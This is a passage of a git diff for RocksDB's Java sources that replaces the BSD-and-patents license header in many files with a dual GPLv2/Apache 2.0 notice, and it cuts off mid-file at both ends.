root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java index 71c77b64330..55d67a3a375 100644 --- a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java +++ b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/java/src/main/java/org/rocksdb/Checkpoint.java b/java/src/main/java/org/rocksdb/Checkpoint.java index d8672277843..0009699325c 100644 --- a/java/src/main/java/org/rocksdb/Checkpoint.java +++ b/java/src/main/java/org/rocksdb/Checkpoint.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ChecksumType.java b/java/src/main/java/org/rocksdb/ChecksumType.java index 7f560170c01..def9f2e9f49 100644 --- a/java/src/main/java/org/rocksdb/ChecksumType.java +++ b/java/src/main/java/org/rocksdb/ChecksumType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ClockCache.java b/java/src/main/java/org/rocksdb/ClockCache.java index 7a2c8e7f873..a66dc0e8a72 100644 --- a/java/src/main/java/org/rocksdb/ClockCache.java +++ b/java/src/main/java/org/rocksdb/ClockCache.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java b/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java index 84581f465c7..d932fd9a927 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java b/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java index 6aa22d3feaf..7726cc62d79 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java b/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java index 5528dca62c1..647b92e16cb 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java index 78901517983..5cb68b46148 100644 --- a/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java b/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java index f7925f58fe5..f795807804d 100644 --- a/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java +++ b/java/src/main/java/org/rocksdb/CompactionOptionsFIFO.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java b/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java index c6a49cf850b..d2dfa4eef1a 100644 --- a/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java +++ b/java/src/main/java/org/rocksdb/CompactionOptionsUniversal.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionPriority.java b/java/src/main/java/org/rocksdb/CompactionPriority.java index 17dcb993570..a4f53cd64c8 100644 --- a/java/src/main/java/org/rocksdb/CompactionPriority.java +++ b/java/src/main/java/org/rocksdb/CompactionPriority.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompactionStyle.java b/java/src/main/java/org/rocksdb/CompactionStyle.java index 22dc7dcf5fa..5e13363c44c 100644 --- a/java/src/main/java/org/rocksdb/CompactionStyle.java +++ b/java/src/main/java/org/rocksdb/CompactionStyle.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Comparator.java b/java/src/main/java/org/rocksdb/Comparator.java index 009f2e51f40..817e00fd274 100644 --- a/java/src/main/java/org/rocksdb/Comparator.java +++ b/java/src/main/java/org/rocksdb/Comparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompressionOptions.java b/java/src/main/java/org/rocksdb/CompressionOptions.java index 9fe21e3d350..4927770e523 100644 --- a/java/src/main/java/org/rocksdb/CompressionOptions.java +++ b/java/src/main/java/org/rocksdb/CompressionOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CompressionType.java b/java/src/main/java/org/rocksdb/CompressionType.java index bcb2e8ba2fc..2781537c88f 100644 --- a/java/src/main/java/org/rocksdb/CompressionType.java +++ b/java/src/main/java/org/rocksdb/CompressionType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DBOptions.java b/java/src/main/java/org/rocksdb/DBOptions.java index bc8cfa75332..14f0c6c7c9a 100644 --- a/java/src/main/java/org/rocksdb/DBOptions.java +++ b/java/src/main/java/org/rocksdb/DBOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DBOptionsInterface.java b/java/src/main/java/org/rocksdb/DBOptionsInterface.java index aeee6414a06..50ca083d37a 100644 --- a/java/src/main/java/org/rocksdb/DBOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/DBOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DbPath.java b/java/src/main/java/org/rocksdb/DbPath.java index 2a48b63d272..3f0b67557c5 100644 --- a/java/src/main/java/org/rocksdb/DbPath.java +++ b/java/src/main/java/org/rocksdb/DbPath.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DirectComparator.java b/java/src/main/java/org/rocksdb/DirectComparator.java index d2880475699..4c37dfd56bb 100644 --- a/java/src/main/java/org/rocksdb/DirectComparator.java +++ b/java/src/main/java/org/rocksdb/DirectComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/DirectSlice.java b/java/src/main/java/org/rocksdb/DirectSlice.java index 6a7654ffe0a..b0d35c3cc5a 100644 --- a/java/src/main/java/org/rocksdb/DirectSlice.java +++ b/java/src/main/java/org/rocksdb/DirectSlice.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/EncodingType.java b/java/src/main/java/org/rocksdb/EncodingType.java index e27a9853ff8..5ceeb54c826 100644 --- a/java/src/main/java/org/rocksdb/EncodingType.java +++ b/java/src/main/java/org/rocksdb/EncodingType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Env.java b/java/src/main/java/org/rocksdb/Env.java index 7d30ea5df11..a46f06178dd 100644 --- a/java/src/main/java/org/rocksdb/Env.java +++ b/java/src/main/java/org/rocksdb/Env.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/EnvOptions.java b/java/src/main/java/org/rocksdb/EnvOptions.java index 0ef55327173..2bca0355e43 100644 --- a/java/src/main/java/org/rocksdb/EnvOptions.java +++ b/java/src/main/java/org/rocksdb/EnvOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Experimental.java b/java/src/main/java/org/rocksdb/Experimental.java index dcbbd37ee53..64b404d6f19 100644 --- a/java/src/main/java/org/rocksdb/Experimental.java +++ b/java/src/main/java/org/rocksdb/Experimental.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Filter.java b/java/src/main/java/org/rocksdb/Filter.java index 01853d9694a..011be208561 100644 --- a/java/src/main/java/org/rocksdb/Filter.java +++ b/java/src/main/java/org/rocksdb/Filter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/HistogramData.java b/java/src/main/java/org/rocksdb/HistogramData.java index a920f4b4e27..11798eb59f2 100644 --- a/java/src/main/java/org/rocksdb/HistogramData.java +++ b/java/src/main/java/org/rocksdb/HistogramData.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/HistogramType.java b/java/src/main/java/org/rocksdb/HistogramType.java index bd001ed0253..2d95f5149f5 100644 --- a/java/src/main/java/org/rocksdb/HistogramType.java +++ b/java/src/main/java/org/rocksdb/HistogramType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/IndexType.java b/java/src/main/java/org/rocksdb/IndexType.java index c1954e0995b..e0c113d39ac 100644 --- a/java/src/main/java/org/rocksdb/IndexType.java +++ b/java/src/main/java/org/rocksdb/IndexType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java b/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java index 21aab069e03..7343691817b 100644 --- a/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java +++ b/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java @@ -1,8 +1,8 @@ package org.rocksdb; // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). import java.util.List; diff --git a/java/src/main/java/org/rocksdb/LRUCache.java b/java/src/main/java/org/rocksdb/LRUCache.java index f4a509dce00..5e5bdeea277 100644 --- a/java/src/main/java/org/rocksdb/LRUCache.java +++ b/java/src/main/java/org/rocksdb/LRUCache.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Logger.java b/java/src/main/java/org/rocksdb/Logger.java index 5db377dde15..90212592908 100644 --- a/java/src/main/java/org/rocksdb/Logger.java +++ b/java/src/main/java/org/rocksdb/Logger.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/MemTableConfig.java b/java/src/main/java/org/rocksdb/MemTableConfig.java index 8b854917f9e..83cee974a75 100644 --- a/java/src/main/java/org/rocksdb/MemTableConfig.java +++ b/java/src/main/java/org/rocksdb/MemTableConfig.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/MergeOperator.java b/java/src/main/java/org/rocksdb/MergeOperator.java index 2cc1a1f3af2..296527f53f9 100644 --- a/java/src/main/java/org/rocksdb/MergeOperator.java +++ b/java/src/main/java/org/rocksdb/MergeOperator.java @@ -1,7 +1,7 @@ // Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com). All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java index 959d5b79dfd..3585318dbda 100644 --- a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java +++ b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java index e6f30a718fc..c2efcc54b6b 100644 --- a/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/MutableColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Options.java b/java/src/main/java/org/rocksdb/Options.java index ad6b7ae37ad..dcd1138a8ab 100644 --- a/java/src/main/java/org/rocksdb/Options.java +++ b/java/src/main/java/org/rocksdb/Options.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/PlainTableConfig.java b/java/src/main/java/org/rocksdb/PlainTableConfig.java index 044c18d8032..c099981678b 100644 --- a/java/src/main/java/org/rocksdb/PlainTableConfig.java +++ b/java/src/main/java/org/rocksdb/PlainTableConfig.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/RateLimiter.java b/java/src/main/java/org/rocksdb/RateLimiter.java index 6f4fef014df..fc2388777e9 100644 --- a/java/src/main/java/org/rocksdb/RateLimiter.java +++ b/java/src/main/java/org/rocksdb/RateLimiter.java @@ -1,7 +1,7 @@ // Copyright (c) 2015, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ReadOptions.java b/java/src/main/java/org/rocksdb/ReadOptions.java index ccdea296455..9d7b999561b 100644 --- a/java/src/main/java/org/rocksdb/ReadOptions.java +++ b/java/src/main/java/org/rocksdb/ReadOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/ReadTier.java b/java/src/main/java/org/rocksdb/ReadTier.java index c6f48214d91..6dc76c52e58 100644 --- a/java/src/main/java/org/rocksdb/ReadTier.java +++ b/java/src/main/java/org/rocksdb/ReadTier.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java b/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java index 1beb45c46f0..6ee81d858c8 100644 --- a/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java +++ b/java/src/main/java/org/rocksdb/RemoveEmptyValueCompactionFilter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RestoreOptions.java b/java/src/main/java/org/rocksdb/RestoreOptions.java index 54b0eff28cb..94d93fc719c 100644 --- a/java/src/main/java/org/rocksdb/RestoreOptions.java +++ b/java/src/main/java/org/rocksdb/RestoreOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksDB.java b/java/src/main/java/org/rocksdb/RocksDB.java index 4a32f6a6a2f..eda0950990a 100644 --- a/java/src/main/java/org/rocksdb/RocksDB.java +++ b/java/src/main/java/org/rocksdb/RocksDB.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksDBException.java b/java/src/main/java/org/rocksdb/RocksDBException.java index 25aadad8fa7..8b035f458f3 100644 --- a/java/src/main/java/org/rocksdb/RocksDBException.java +++ b/java/src/main/java/org/rocksdb/RocksDBException.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksEnv.java b/java/src/main/java/org/rocksdb/RocksEnv.java index 72dc22c42c3..8fe61fd451f 100644 --- a/java/src/main/java/org/rocksdb/RocksEnv.java +++ b/java/src/main/java/org/rocksdb/RocksEnv.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksIterator.java b/java/src/main/java/org/rocksdb/RocksIterator.java index 42e2460cf1d..9e9c6480928 100644 --- 